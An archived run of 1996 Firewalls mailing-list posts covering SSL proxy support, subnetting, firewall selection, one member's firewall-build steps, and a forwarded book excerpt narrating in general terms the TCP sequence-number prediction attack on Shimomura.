BAA08605 for firewalls-outgoing; Sun, 7 Jan 1996 01:42:31 -0800 (PST) Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA08600 for ; Sun, 7 Jan 1996 01:42:28 -0800 (PST) Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA25370 for Firewalls@GreatCircle.COM; Sun, 7 Jan 96 04:41:35 -0500 Apparently-To: Message-Id: Date: 7 Jan 1996 04:51:49 U From: "Server #7000007" Subject: Undeliverable Mail X-Mailer: Mail*Link SMTP-MS 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. 
Message: Firewalls-Digest V5 #8 Sent: Sat, Jan 6, 1996 4:30 AM To: Harris Tom On Server: PRC Bellevue NE MS Date: Sun, Jan 7, 1996 4:51 AM Reason: Could not be delivered because the destination Microsoft Mail server could not be found.

From firewalls-owner Sun Jan 7 05:44:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA10968 for firewalls-outgoing; Sun, 7 Jan 1996 05:16:49 -0800 (PST) Received: from vogon.muc.de (vogon.muc.de [193.174.4.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA10963 for ; Sun, 7 Jan 1996 05:16:38 -0800 (PST) Received: from cottage ([194.94.228.134]) by vogon.muc.de with SMTP id <93554-2>; Sun, 7 Jan 1996 14:15:08 +0100 Comments: Authenticated sender is From: "Andreas Grau" To: firewalls@greatcircle.com Date: Sun, 7 Jan 1996 15:12:30 +0100 Subject: Off-Topic: Selling Firewalls Reply-to: grau@muc.de X-mailer: Pegasus Mail for Windows (v2.23) Message-Id: <96Jan7.141508met.93554-2@vogon.muc.de> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Please don't flame me for this (possibly) off-topic question, but I think the best answer for my question is with the members of this great list.

I started working for a VAR of firewalls and other network related products. When it comes to writing proposals, I feel there must be tools to effectively support the selling process:

- how to draw network designs
- how to calculate network topology, e.g. IP-numbers and netmasks
- how to calculate the costs for the equipment (firewalls, routers ...)
- how to ...

How do you network consultants and resellers work out there, how do you make your life easier when it comes to desktop work? I feel there are better tools than M$-Word or Powerpoint to generate good proposals and solutions.
TIA, Andreas
--
Andreas Grau grau@muc.de

From firewalls-owner Sun Jan 7 19:44:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA22712 for firewalls-outgoing; Sun, 7 Jan 1996 19:39:15 -0800 (PST) Received: from osa.osa.com.au (osa.osa.com.au [203.6.130.129]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA22707 for ; Sun, 7 Jan 1996 19:39:08 -0800 (PST) Received: from redgum.osa.com.au (redgum.osa.com.au [15.16.33.1]) by osa.osa.com.au (8.6.12/8.6.9) with ESMTP id OAA29613 for ; Mon, 8 Jan 1996 14:38:07 +1100 Received: from zeus.osa.com.au (zeus.osa.com.au [15.16.33.60]) by redgum.osa.com.au (8.6.9/8.6.9) with SMTP id OAA16315 for ; Mon, 8 Jan 1996 14:36:30 +1100 Received: by zeus.osa.com.au (AIX 4.1/UCB 5.64/4.03) id AA16914; Mon, 8 Jan 1996 14:38:05 +1100 From: tma@osa.com.au (Tim Adam) Message-Id: <9601080338.AA16914@zeus.osa.com.au> Subject: Re: SSL and S-HTTP Proxy support To: firewalls@GreatCircle.COM Date: Mon, 8 Jan 1996 14:38:04 +1100 (EST) In-Reply-To: <199601051841.NAA00513@hatteras.ch.inri.com> from "Bill Bunting" at Jan 5, 96 01:41:08 pm Organization: Open Software Associates X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Bill Bunting writes:
> SSL is not the type of protocol that requires a proxy. SSL is a Secure
> Sockets Layer API that can be used with any TCP port. For example, you can
> use SSL to secure a FTP, Telnet, WWW, or any other TCP protocol. Did TIS
> really tell you that they have a SSL proxy?? If so, what does it do?

See ftp://ds.internic.net/internet-drafts/draft-luotonen-ssl-tunneling-02.txt

Tim.
-- Tim Adam tma@osa.com.au http://www.osa.com.au/ Open Software Associates Melbourne, Australia From firewalls-owner Sun Jan 7 20:29:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA23468 for firewalls-outgoing; Sun, 7 Jan 1996 20:18:06 -0800 (PST) Received: from switchblade.v-one.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA23463 for ; Sun, 7 Jan 1996 20:18:02 -0800 (PST) Received: (from mjr@localhost) by switchblade.v-one.com (8.6.9/8.6.9) id XAA25510 for firewalls@greatcircle.com; Sun, 7 Jan 1996 23:17:38 -0500 From: "Marcus J. Ranum" Message-Id: <199601080417.XAA25510@switchblade.v-one.com> Subject: new home for FAQ, and job openings To: firewalls@greatcircle.com Date: Sun, 7 Jan 1996 23:17:37 -0500 (EST) Reply-To: mjr@switchblade.v-one.com Organization: V-One Corporation, Baltimore, MD Office URL: Mjr's page Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The Internet Firewalls FAQ's home has moved once again. I'll be maintaining it now from: http://www.v-one.com/pubs/fw-faq/faq.htm Please update your pointers and web pages if you have hyperlinks. Also: if you're looking for, or know people who are good who are looking for work with a hot networking company, please see: http://www.v-one.com/misc/news.htm Thanks! mjr. 
From firewalls-owner Mon Jan 8 00:44:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA26869 for firewalls-outgoing; Mon, 8 Jan 1996 00:24:26 -0800 (PST) Received: from mailhost.ixos.de (HOST.50.22.ixos.de [149.235.50.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA26855 for ; Mon, 8 Jan 1996 00:24:19 -0800 (PST) From: snoopy@munich.ixos.de Received: from polo.ixos.de ixos.de by mailhost.ixos.de with SMTP (5.65+/ixos-1.0.7) via Internet for greatcircle.com id AA02357; Mon, 8 Jan 96 09:23:15 +0100 Message-Id: <9601080823.AA02376@polo.ixos.de> Received: from localhost ixos by polo.ixos.de (4.1/iXOS/lan-1.0.6) via EUnet for mailhost id AA02376; Mon, 8 Jan 96 09:23:13 +0100 X-Mailer: exmh version 1.6.4 10/10/95 To: gamble@dxcoms.cern.ch Cc: firewalls@GreatCircle.com, pdetemme@cisco.com Subject: Re: Looking for a speaker In-Reply-To: Your message of "Thu, 04 Jan 1996 09:24:28 +0100." <9601040824.AA23767@dxcoms.cern.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Date: Mon, 08 Jan 1996 09:23:12 +0100 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi there,

I would perhaps do it: I have a brother in Vevey - might be a nice chance to go and visit him. If you pay the travel, I would like to do it. I am the Sysadmin here and I do give tutorials and talks on such subjects...

Love, Snoopy
--
snoopy@munich.ixos.de
"The USA have Bill Clinton, Stevie Wonder, Bob Hope, Johnny Cash. We have Helmut Kohl - no wonder, no hope, no cash..."
From firewalls-owner Mon Jan 8 02:16:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA00718 for firewalls-outgoing; Mon, 8 Jan 1996 02:12:04 -0800 (PST) Received: from hugin.mainz.dk (Hugin.mainz.dk [130.227.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA00713 for ; Mon, 8 Jan 1996 02:11:59 -0800 (PST) Date: Mon, 08 Jan 1996 11:11:01 +0100 (MET) Date-warning: Date header was inserted by MAINZ.DK From: Kim Wohlert Subject: RE: Bastion netmask query To: Firewalls@GreatCircle.COM Message-id: <01HZRKLT6HNM0003MC@MAINZ.DK> MIME-version: 1.0 X-Mailer: Windows Eudora Light Version 1.5.2 Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: "Kurt Buff (Volt Comp)" >Date: Thu, 4 Jan 1996 22:00:01 -0800 >Subject: RE: Bastion netmask query > >It seems to me that someone with half a brain (not me, I only have 1/4) >could write a simple program (PERL, VB, ??) that would take some input >(number of nodes, number of segments, network address(es), etc.) and output >some reasonable netmasking and segmenting suggestions, including >forbidden/unwise host addresses (due to broadcast address conflicts, etc.). >Does anyone know of such a beastie? Or would this really be such a hard >thing to write? > No, and someone did. It is called RFC 1878: http://www.internic.net/rfc/rfc1878.txt T. Pummill, B. Manning, "Variable Length Subnet Table For IPv4", 12/26/1995. 
(Pages=8)

-Kim
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Kim Wohlert          |Internet:Kim.Wohlert@mainz.dk
erik mainz a/s       |X.400: c=DK a=DK400 p=Minerva
Dortheavej 7         |o=mainz s=Wohlert g=Kim
DK-2400 Copenhagen   |Phone: +45 38 34 77 88
Denmark              |Fax: +45 31 19 16 25
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Books: Virtual Reality unplugged

From firewalls-owner Mon Jan 8 04:14:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA02387 for firewalls-outgoing; Mon, 8 Jan 1996 03:52:40 -0800 (PST) Received: from synet.edu.cn (saint.synet.edu.cn [202.112.29.85]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA02382 for ; Mon, 8 Jan 1996 03:52:26 -0800 (PST) Received: from neu.edu.cn (bengal.neu.edu.cn) by synet.edu.cn (5.x/SMI-SVR4) id AA11994; Mon, 8 Jan 1996 19:53:05 +0800 Received: by neu.edu.cn (4.1/SMI-4.1) id AA05119; Mon, 8 Jan 96 19:53:25 CsT From: guxj@neu.edu.cn (Gu Xinji) Message-Id: <9601081153.AA05119@neu.edu.cn> Subject: Proxy ? To: firewalls@GreatCircle.com Date: Mon, 8 Jan 1996 19:53:25 +0800 (CsT) Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

We are going to provide Internet service, and need some kind of packet filtering or proxy services so that the government won't kick us out. My questions are (I only want firewall function for WWW):

1). What kind of machine (Sun's) do I need to install a proxy server on, so that it can support 20,000 users? Or is this possible (one machine)?
2). If I use a SS20 with 128M memory as proxy server, how many users can it support?
3). Would it be better for me to use a Cisco7500 (or what better?) to filter out certain http addresses than to use a proxy service? Again, can Cisco support so many users?
4). What kind of proxy product would you recommend for efficiency, and easy operation (especially on the client end)?

Thanks in advance.
Xinji Gu guxj@neu.edu.cn From firewalls-owner Mon Jan 8 05:33:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA04423 for firewalls-outgoing; Mon, 8 Jan 1996 05:26:07 -0800 (PST) Received: from mail.nyc.pipeline.com (mail.nyc.pipeline.com [198.80.32.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA04411 for ; Mon, 8 Jan 1996 05:26:02 -0800 (PST) Received: from pipe4.nyc.pipeline.com (jya@pipe4.nyc.pipeline.com [198.80.32.44]) by mail.nyc.pipeline.com (8.7.3/8.7.3) with ESMTP id IAA20730; Mon, 8 Jan 1996 08:25:06 -0500 (EST) From: John Young Received: (jya@localhost) by pipe4.nyc.pipeline.com (8.6.9/8.6.9) id IAA02811; Mon, 8 Jan 1996 08:25:06 -0500 Date: Mon, 8 Jan 1996 08:25:06 -0500 Message-Id: <199601081325.IAA02811@pipe4.nyc.pipeline.com> To: firewalls@GreatCircle.com Cc: frankw@in.net Subject: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Responding to msg by frankw@in.net (Frank Willoughby) on Sun, 7 Jan 11:41 PM Two clarifications of the post by Frank Willoughby on the TCP/IP attack described in Jonathan's Littman new book: 1. The material posted is directly from Littman's book, not my paraphrase. 2. The attacker has not been proven to be Mitnick, only alleged. Whether it was Mitnick is a principal question of Littman's book. 
From firewalls-owner Mon Jan 8 06:50:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA05788 for firewalls-outgoing; Mon, 8 Jan 1996 06:22:30 -0800 (PST) Received: from dsn20 ([164.167.138.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA05775 for ; Mon, 8 Jan 1996 06:22:18 -0800 (PST) Received: from [164.167.86.100] by dsn20 (5.59/25-eef) id AA15571; Mon, 8 Jan 96 08:47:35 EST Message-Id: <9601081347.AA15571@dsn20> Comments: Authenticated sender is From: "Bob Resino" To: grau@muc.de, firewalls@GreatCircle.COM Date: Mon, 8 Jan 1996 09:18:24 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: Off-Topic: Selling Firewalls Reply-To: pnh1rgr@mclo10.med.navy.mil X-Mailer: Pegasus Mail for Windows (v2.10) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Please don't flame me for this (possibly) off-topic question, but I
> think the best answer for my question is with the members of this great list.
>
> I started working for a VAR of firewalls and other network related
> products. When it comes to writing proposals, I feel there must be
> tools to effectively support the selling process
>
> - how to draw network designs
> - how to calculate network topology, e.g. IP-numbers and netmasks
> - how to calculate the costs for the equipment (firewalls, routers ...)
> - how to ...
>
> How do you network consultants and resellers work out there, how do
> you make your life easier when it comes to desktop work. I feel
> there are better tools than M$-Word or Powerpoint to generate good
> proposals and solutions.
>
> TIA, Andreas
> -- Andreas Grau grau@muc.de
>

You might want to think about a CAD package, like Intergraph Microstation or IsiCad. The Microstation product has links to several database formats and there are several cell libraries for data-comms available.
With Windows ODBC, this data can be incorporated into Excel, Word and/or Powerpoint. I have used IsiCad to do network maps and updates for HP OpenView. I guess it depends on what you're looking for.

Bob Resino (RGR24) Head, MID/Data-telecommunications 804-398-7400 x322 MCLO, HSO, Norfolk, VA (US Navy) Fax 804-398-7265 pnh1rgr@mclo10.med.navy.mil

From firewalls-owner Mon Jan 8 07:14:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA06745 for firewalls-outgoing; Mon, 8 Jan 1996 07:04:34 -0800 (PST) Received: from emh.ramstein.af.mil (emh.ramstein.af.mil [132.25.130.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA06731 for ; Mon, 8 Jan 1996 07:04:29 -0800 (PST) Received: from outgate.ramstein.af.mil by emh.ramstein.af.mil with SMTP (1.37.109.16/16.2) id AA115153485; Mon, 8 Jan 1996 16:04:45 +0100 Received: by outgate.ramstein.af.mil with Microsoft Mail id <30F1B0F4@outgate.ramstein.af.mil>; Mon, 08 Jan 96 16:04:04 PST From: Hescock Brian TSgt 786CS/SCNBN To: firewalls Subject: firewall reviews/comparisons Date: Mon, 08 Jan 96 16:00:00 PST Message-Id: <30F1B0F4@outgate.ramstein.af.mil> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I just subscribed to your mail list today so please forgive my first question:

1) Which software is required to view the .Z files and where can I get it?

2) I've been searching for information on the best firewall to purchase for our needs and have not come across any reviews/comparisons on which is best (I have a list of all of the firewalls available and their descriptions but not any comparisons). Anyone know of any reviews and where to find them? We require a firewall which could support a very high throughput so we would probably require a hardware-based firewall. Configuring our front-end router to act as a firewall isn't a practical option. Any information would be appreciated.
Thanks, Brian Hescock hescockb@86aw4.ramstein.af.mil

From firewalls-owner Mon Jan 8 10:01:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA11194 for firewalls-outgoing; Mon, 8 Jan 1996 09:56:09 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA11189 for ; Mon, 8 Jan 1996 09:56:05 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA17201; Mon, 8 Jan 1996 11:55:08 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA17190; Mon, 8 Jan 1996 11:55:03 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id LAA09147; Mon, 8 Jan 1996 11:55:38 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA21565; Mon, 8 Jan 1996 11:55:39 -0600 Date: Mon, 8 Jan 1996 11:55:39 -0600 From: Rick Smith Message-Id: <199601081755.LAA21565@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, mckenney@smiley.mitre.org Subject: Re: SSL and S-HTTP Proxy support Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

mckenney@smiley.mitre.org (Brian W. McKenney) writes:

>I would like to have an update as to which commercial firewall vendors
>support or plan to support (when) an SSL and/or S-HTTP proxy. I will post
>a summary.

The answer depends on what you're trying to do. If you're trying to let clients residing on a protected internal net browse an external, less trustworthy net (the Internet) then all the major firewalls should provide similar service, including our Sidewinder. The service is based on a generic proxy that tunnels the traffic through the firewall. Some firewalls (like Sidewinder) can apply access controls as follows:

1) permit/deny traffic according to source IP address.
2) permit/deny traffic according to destination IP address.
3) restrict to inbound only or outbound only.
4) require login/password from browser.

All except 4) are generic proxy controls and not specific to Web service. As far as I know, *nobody* actually cracks the SSL at the firewall and applies access control on the crypto credentials being passed. With today's Netscape browsers, of course, this can only authenticate the server being accessed, not the client. I don't know of anyone doing this with SHTTP, either. If anyone does, I'd be interested to hear what security objectives are involved and what mechanism is used.

If, on the other hand, you need to provide Web service to clients on a potentially hostile external network (the Internet) then existing proxy techniques aren't going to protect you much. You need to host the Web service on a platform capable of resisting sophisticated attacks. That's a different problem.

Rick. smith@sctc.com secure computing corporation

From firewalls-owner Mon Jan 8 10:44:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA11383 for firewalls-outgoing; Mon, 8 Jan 1996 10:03:14 -0800 (PST) Received: from emmalani.queens.hawaii.org ([168.105.7.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA11365 for ; Mon, 8 Jan 1996 10:02:53 -0800 (PST) Received: from smtp.queens.hawaii.org by emmalani.queens.hawaii.org (AIX 3.2/UCB 5.64/4.03) id AA06154; Mon, 8 Jan 1996 07:50:45 -1000 Received: from QMC-Message_Server by QUEENS.HAWAII.ORG with Novell_GroupWise; Mon, 08 Jan 1996 07:59:11 -1000 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 08 Jan 1996 07:56:01 -1000 From: DARRYL PANG To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V5 #8 -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

FYI gang. And "NO" we are NEVER going to use FreeBSD!!

Mahalo, DPP. \m/ ^_^ \m/
++++++++++++++++++++++++++++++++++++
A Manager does the thing right.
A Leader does the right thing.
++++++++++++++++++++++++++++++++++++

>>> 01/05/96 11:00pm >>>

Firewalls-Digest Saturday, 6 January 1996 Volume 05 : Number 008

In this issue:
SSL and S-HTTP Proxy support
Re: Security managing Cisco Routers
Re: SSL and S-HTTP Proxy support
Steps in building a firewall, Right or Wrong?

See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues.

----------------------------------------------------------------------

From: cbk@ingress.com (Charles B. Kaplan) Date: Fri, 5 Jan 1996 23:21:13 -0500 Subject: SSL and S-HTTP Proxy support

From what I remember S-HTTP can be fully negotiated within the 'standard' HTTP ports/protocol. Therefore any proxy supporting HTTP should work with S-HTTP. Next, while SSL COULD be implemented across multiple protocols, etc, the 'only' widespread use presently is via netscape, and that makes use of port 443 'normally'. The BorderWare Firewall Server, from BNTI out of the box proxies ports 80, 8001, 8080, and 443, all when its WWW proxy is enabled. I don't see why however you couldn't say use plug-gw on port 443 to do the same types of things. NOTE however, putting your web server inside your firewall, and then proxying to it is a BIG risk. That of course is why BorderWare provides a 3rd network interface for 'secured servers'. Well, enough plugging of BorderWare....if you didn't guess I resell it. Anyone care to either verify or correct the above S-HTTP notes ?

- -Charles Kaplan for more information on BorderWare call 800-254-7159

------------------------------

From: Bill Husler Date: Fri, 5 Jan 1996 20:22:58 -0800 Subject: Re: Security managing Cisco Routers

>>>At 02:15 PM 12/27/95 GMT, Pietro wrote:
>>>
>>>>My actual problem is to manage several Cisco Routers situated
>>>>on a public network from a central site, from where there is no
>>>>way to guarantee secure communication.
>>>>
>
>>I have heard that Firewall-1 will manage the configurations of CISCO
>>routers remotely. I believe the way it works is that you set up the
>>configuration on a Firewall-1 Administrative Workstation and it sends
>>some sort of encrypted/secured transmission to the router to download the
>>new config.
>>Bill
>>
>
>Although I'm not intimately familiar with the internal mechanisms of
>Firewall-1, I do have a problem with the above paragraph, since we
>do not (yet) support encrypted transport mechanisms. :-)
>
>- paul
>
>--
>Paul Ferguson || ||
>Consulting Engineering || ||
>Reston, Virginia USA |||| ||||
>tel: +1.703.716.9538 ..:||||||:..:||||||:..
>e-mail: pferguso@cisco.com c i s c o S y s t e m s
>
>

Paul, You're absolutely right! I talked to our Firewall-1 dudes (actually SUN) and they said that communication is in the clear. I don't know what I heard that made me believe otherwise. Sorry if I muddied the waters. I also asked them to describe why we should have "warm fuzzies" that the changes being made to the router configuration are indeed being sent from the FW-1 admin and not some admin wannabe. I will post their response.

Bill

------------------------------

From: Bill Husler Date: Fri, 5 Jan 1996 20:46:16 -0800 Subject: Re: SSL and S-HTTP Proxy support

>From: Brian W. McKenney, mckenney@smiley.mitre.org
>
>I would like to have an update as to which commercial firewall vendors
>support or plan to support (when) an SSL and/or S-HTTP proxy. I will post
>a summary.
>
>This is the information that I have:
>
>1. TIS Gauntlet: SSL and S-HTTP proxies in next release.
>2. KarlBridge/KarlBrouter: S-HTTP proxy
>3. Milkyway Blackhole: S-HTTP
>4. SOS Brimstone: S-HTTP proxy
>5. Technologic Interceptor: S-HTTP proxy
>6. V-One SmartWall: S-HTTP proxy
>
>License versions of TIS Gauntlet will support whatever the next Gauntlet
>release supports.
>

You can add ANS Interlock to your list.
Bill

------------------------------

From: bart@pu.com (Bart Rivard) Date: Sat, 6 Jan 1996 01:49:18 -0600 Subject: Steps in building a firewall, Right or Wrong?

Hi, I think one of the things about building a firewall that has surprised me is how really simple it really is. It makes me wonder if I have done something wrong. Many people say use the TIS toolkit but I really don't see any reason. Here are the steps I have taken; tell me what you think.

1) Installed FreeBSD on a Pentium 100 with 32 MB of Ram and two Ethernet NICs

2) Configured the Kernel such that IP forwarding and Source routing are disabled.

3) Deleted all accounts on the system except root

4) Gave root a password with numbers, letters, uppercase and lowercase, 10 long

5) Deleted everything out of inetd.conf except DNS

6) Configured DNS so that the only machines it knows about are a Web server which is in the DMZ and the firewall machine, and a wildcard MX record.

7) Configured resolv.conf on firewall to point to the internal network DNS.

8) Turned off source routing on the CISCO 2500 router and added filters which disabled all UDP traffic except port DNS/53, all TCP inbound traffic except SMTP to firewall, News from specific news server to firewall, http to web server in DMZ. Allow all outbound TCP traffic. Thinking about disabling all ICMP traffic on router, what do you think?

9) Configured CERN web server as a proxy on the firewall using a weird port number. Wrapped the port with TCP Wrappers and only allow access from internal IP addresses. Internal IP addresses are 192.168.0.0 thru 192.168.255.255. Wish I could limit access to web proxy by network interface but don't know how?

10) Modified a mail program so that it reads mail from port 25 and writes the mail messages to disk. Completely dumb program. Does not handle distribution lists, aliases or anything. I then pick mail up off of disk and send it to internal CC mail gateway. Was there shareware to do equivalent? Can sendmail pick mail up off of disk?
Is it safe to have sendmail pick mail up off of disk and distribute?

11) Put TCP Wrapper around news server port to only accept connections from our news provider at AT&T and internal network. Also use inn access control to limit access from internal network for reading news and news provider for dumping news.

Well, that's about it. We provide outbound Web, Gopher, FTP and WAIS through the CERN Proxy. Is this safe? We don't allow any UDP to pass firewall. We don't allow anything to come in from the outside through the firewall except mail. The firewall doubles as a news server so we don't allow news to pass through firewall but the firewall doubles as a news server. Is it safe to use a firewall as a news server?

Please comment!! Send all comments to bart@pu.com.

TIA, Bart

------------------------------

End of Firewalls-Digest V5 #8
*****************************

To unsubscribe from Firewalls-Digest, send the following command in the body of a message to "Majordomo@GreatCircle.COM": unsubscribe firewalls-digest

To subscribe, send the command "subscribe firewalls-digest" instead. If you want to subscribe or unsubscribe something other than the account the mail is coming from, such as a local redistribution list, then append that address to the command; for example, to subscribe "local-firewalls": subscribe firewalls-digest local-firewalls@your.domain.net

A non-digest (direct mail) version of this list is also available; to subscribe to that instead, replace all instances of "firewalls-digest" in the commands above with "firewalls".

Compressed back issues are available for anonymous FTP from FTP.GreatCircle.COM, in pub/firewalls/digest/vNN.nMMM.Z (where "NN" is the volume number, and "MMM" is the issue number).
From firewalls-owner Mon Jan 8 13:30:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA16064 for firewalls-outgoing; Mon, 8 Jan 1996 13:00:40 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA23625 for ; Sun, 7 Jan 1996 20:42:26 -0800 (PST) Received: from pm4-20.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA17466; Sun, 7 Jan 96 23:41:31 -0500 Date: Sun, 7 Jan 96 23:41:31 -0500 Message-Id: <9601080441.AA17466@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Cc: John Young Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following mail was posted on the Cypherpunks mailing list by John Young (whose name appears on the cc:). I have his permission to post his mail here. John mentioned that he was curious about responses to his posting in this mailing list, so I would like to request that you cc: him in your replies to this thread. Also, John mentioned that the info cited in his posting is extracted from Jonathan Littman's book: Jonathan Littman, an investigative reporter, has published "The Fugitive Game: Online With Kevin Mitnick," Little Brown, 1996. 381 pp. $23.95. ISBN 0-316-52858-7. The relevance of the text to the firewalls mailing list is fairly obvious as it describes the operation of the TCP Sequence Number Prediction Attack used by Mitnick to break into Tsutomu Shimomura's computer. A number of people have sent me mails or called me about my previous postings on TCP Sequence Number Prediction Attacks. This mail should help to fill in some of the blanks on the subject. FWIW, I still maintain that this is a vulnerability in a number of firewalls (but then again, that's another thread). 
Enjoy. Best Regards, Frank PS - Stay tuned to my home page for some interesting free stuff in a day or two. Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. ------------8< cut here 8<--------------------------------------------- Return-Path: From: John Young Date: Sun, 7 Jan 1996 15:43:02 -0500 To: cypherpunks@toad.com Subject: Toad Hop Sender: owner-cypherpunks@toad.com Precedence: bulk X-UIDL: 821054482.004 [Before it is publicized, KM describes for Littman the Christmas 1994 attack on Shimomura's systems as a "TCP/IP prediction packet attack." (. . .) below are by Littman.] Three days later, on January 23, Shimomura will describe the attack in a widely distributed public Internet post. IP source address spoofing and TCP/IP sequence number prediction are the technical terms Shimomura uses to describe it, much like Mitnick's description. But his analysis is extremely technical, and even some UNIX security experts find it tough going. That same day, about 2 P.M., CERT will blast out an advisory to its international mailing list of 12,000 Internet sites in the United States, Germany, Australia, the United Kingdom, Japan, and other countries. The vaguely worded report is much less specific than Mitnick's one-minute explanation on the telephone. Most likely, CERT is trying to provide enough detail so Internet sites can protect themselves against future attacks without providing so much detail that it could encourage copycat attacks. On one level, the hack is simple, a clever strike at a basic weakness of the Internet. Computers on the Internet are often programmed to trust other computers. The Internet was created to share information, and the attack on Shimomura, just like the Robert Morris Internet Worm attack seven years before, exploits that trust. 
The Internet has its own way of sending e-mail or files. Messages or files are split into smaller digital chunks or packets, each with its own envelope and address. When each message is sent, it's like a flock of birds that migrates to a planned location and reunites as a flock at the destination. Computers on the Internet often act like great flocks of birds that trust one another too. And all it takes is one enemy bird to infiltrate the flock. . . . On Christmas Day 1994 the attack begins. First, the intruder breaks into a California Internet site that bears the cryptic name toad.com. Working from this machine, the intruder issues seven commands to see who's logged on to Shimomura's workstation, and if he's sharing files with other machines. Finger is one of the common UNIX commands the intruder uses to probe Shimomura's machine. As a security professional Shimomura should have disabled the feature. Finger is so commonly used by hackers to begin attacks that 75 percent of Internet sites, or about 15 million of the more than 20 million Internet users, block its function to increase security. The intruder's making judgment calls on the fly about which commands will help him uncover which machines Shimomura's workstation might trust. He works fast. In six minutes he deduces the pattern of trust between Shimomura's UNIX workstation and an unknown Internet server. Then the automatic spoofing attack begins. It will all be over in sixteen seconds. The prediction packet attack program fires off a flurry of packets to busy out the trusted Internet server so it can't respond. Next, the program sends twenty more packets to Shimomura's UNIX workstation. The program is looking for a pattern in the initial sequence numbers -- the numbers used to acknowledge receipt of data during communications. The program deciphers the returned packets by subtracting each sequence number from the previous one. It notes that each new initial sequence number has grown by exactly 128,000. 
